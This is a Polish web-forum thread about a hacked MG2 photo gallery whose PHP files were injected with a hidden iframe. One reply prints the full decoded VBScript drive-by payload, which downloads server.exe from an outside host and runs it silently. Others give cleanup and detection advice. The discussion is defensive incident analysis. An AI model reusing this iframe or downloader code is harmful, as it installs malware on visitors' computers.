Dzisiaj zauważyłem, że w mojej galerii, MG2, coś się zaczęło krzaczyć. Szybkie śledztwo wykazało, że w plikach głównych php pojawił się na samym początku dziwny wpis:
iframe src='http://thevip.oicp.net/info.html' width=0 height=0></iframe

Po usunięciu wszystko wróciło do normy. Czy ktoś się może orientuje co to za ustrojstwo??

Oakhallow

Na oko jakiś exploit do IE (VBscript, bytecode). No, coś co zamienia komputer odwiedzającego w wysyłające spam zombie... albo inne takie :-D

Jakby komuś była treść potrzebna:
on error resume next dl = "http://thevip.oicp.net/server.exe" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") str5="Adodb.Stream" set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, dl, False x.Send fname1="521.com" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0

ags a możesz jakoś ludzkim językiem

Czy można było to zrobić beż fizycznego wejścia na ftp?? Czy ktoś po prostu buszował po moim serwerze??

Oakhallow

"Po ludzku" oznacza to, ze przeglądającemu stronę zainstaluje się w systemie programik http://thevip.oicp.net/server.exe i będzie się uruchamiał przy każdym starcie systemu. Co może robić taki soft, już napisałem wyżej.

Jeśli pytasz jak ktoś tam wrzucił to świństwo... no hmm, google na hasło "mg2 security" wyrzucają całkiem sporo ciekawych informacji :) Wystarczy jakiś drobny błąd w skrypcie.

Dzięki Muflon.
Wniosek chyba jest taki, że należałoby zrezygnować z tego skryptu.

A mam jeszcze takie pytanko.
Otwierałem swoją galerię FF, ale kiedy pojawił się błąd otworzyłem też IE żeby sprawdzić czy nie rozjechało się coś tylko pod FF. Mam xp ze pełnym kompletem aktualizacji, NOD32 i Outposta. Czy mam problem??

Oakhallow

Czy mam problem??
To już pytanie nie do mnie... nie jestem na bieżąco jeśli chodzi o aktualności w temacie spyware, botnetów itp. Ja bym do tego podszedł z grubej rury, uruchamiając obok jakiś monitor sieci i patrząc co robi. Jeśli "coś jest" to na >50% działa to jako zombie wysyłające spam, teraz to najmodniejszy trend. Myślę że na pewno są jakieś programy, które to wykrywają, jacyś spece od Windows na pewno Ci coś doradzą.

Przepraszam za taką treść, ale nie miałem czasu tego nawet połamać, tylko wydrukowałem literki z kodów ascii z tego skryptu. Zobacz, czy nie masz w ctrl-alt-del 521.com albo server.exe. Ew chwilę po starcie systemu nic nie rób, tylko włącz sobie start -> uruchom -> cmd [enter] i netstat. Jeżeli będą jakieś połączenia, to już jest podejrzane. Proponuję przeskanować Spybot S&D i AdAwarem (bo oba darmowe).

Ewentualnie można jeszcze zobaczyć czy nic podejrzanego nie uruchamia się przy starcie, z rejestru, to są klucze /HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run, RunOnce, Runservices, RunServicesOnce i podobne w pozostałych HKEY_* najwyższego poziomu. Ale dobry exploit będzie potrafił się schować zarówno przed netstatem jak i przed regeditem :(

(te klucze rejestru pisane z pamięci, mogłem się gdzieś machnąć ;-))

Tam gdzie otwierałem strone na IE zrobiłem na wszelki wypadek format c:, a na drugim otwierałem tylko pod FF, co mam nadzieję wyklucza infekcję.

Swoją drogą jest nauczka, że nie wolno do stref zaufanych wrzucać własnych stron i należy je traktować jak każdą inną w necie, czyli z dużą dozą ostrożności.

Oakhallow

Swoją drogą jest nauczka, że nie wolno do stref zaufanych wrzucać własnych stron i należy je traktować jak każdą inną w necie, czyli z dużą dozą ostrożności.
Nauczka jest... ale IMHO zupełnie inna :mrgreen:

Nawet domyślam się jaka.
Ale potem Płatnik sam się obsłuży a np Oblivion sam sie wygra :lol:

Oakhallow

Nawet domyślam się jaka.
Ale potem Płatnik sam się obsłuży a np Oblivion sam sie wygra :lol:

Oakhallow

wpisz w uruchom "msconfig" zobacz co ci sie laduje prz starcie systemu, mozna znalesc interesujacy stuff :) prosty i wygodny sposob bez przegladania rejestrow

--
marnow

Tam wszystkiego nie ma.

Code Stuff Starter i/ub Secure Task Manager.
Rowniez platna wersja Ad-aware ma calkiem ladny czysciciel startupu.

Ech, postawiłem wszystko od nowa i znowu podobna historia. Tym razem mniej subtelnie. Usunąłem wszystkie mg2 z serwera i zostałem bez galerii.
No i teraz zastanawiam się czy to kwestia dziurawej aplikacji mg2 (notabene wystarczy spojrzeć na oficjalne forum skryptu, żeby zobaczyć, że twórca nie bardzo radzi sobie z wszelkimi zabezpieczeniami, co drugi post to linki erotyczne), czy też kwestia zabezpieczeń serwera (nazwa.pl zarzeka się, że to wina skryptu, ale znowuż ja nie ufam im jak psom) i na innym serwerze nie będzie takich wpadek??
W sumie pytanie do innych użytkowników tego skryptu, czy mieliście problemy z włamaniami i podstawianiem różnych niefajnych rzeczy?

Oakhallow

W sumie pytanie do innych użytkowników tego skryptu, czy mieliście problemy z włamaniami i podstawianiem różnych niefajnych rzeczy?


A moze wydasz pare zl mies na hostowana, gotowa ale dostosowywalna galerie i niech sie inni tym przejmuja? Kolejne kilka przyczyn wrzodow mniej z zycia 8) .

Czy masz na myśli coś konkretnego, poza Pbase, które od razu przyszło mi do głowy.

Oakhallow

Czy masz na myśli coś konkretnego, poza Pbase, które od razu przyszło mi do głowy.


Mi tam akurat pbase pasuje, ale wybor w sieci jest spory.
Na forum bylo omawiane np tu:
http://canon-board.info/showthread.php?t=16447
http://canon-board.info/showthread.php?t=14414

I pewnie jeszcze troche w googlu ;)

Na na mg2 jade od dluzszego czasu. Zero takich akcji jak opisujesz. Galeria jest na serwerze mojego IPS ( lokalna siec osiedlowa).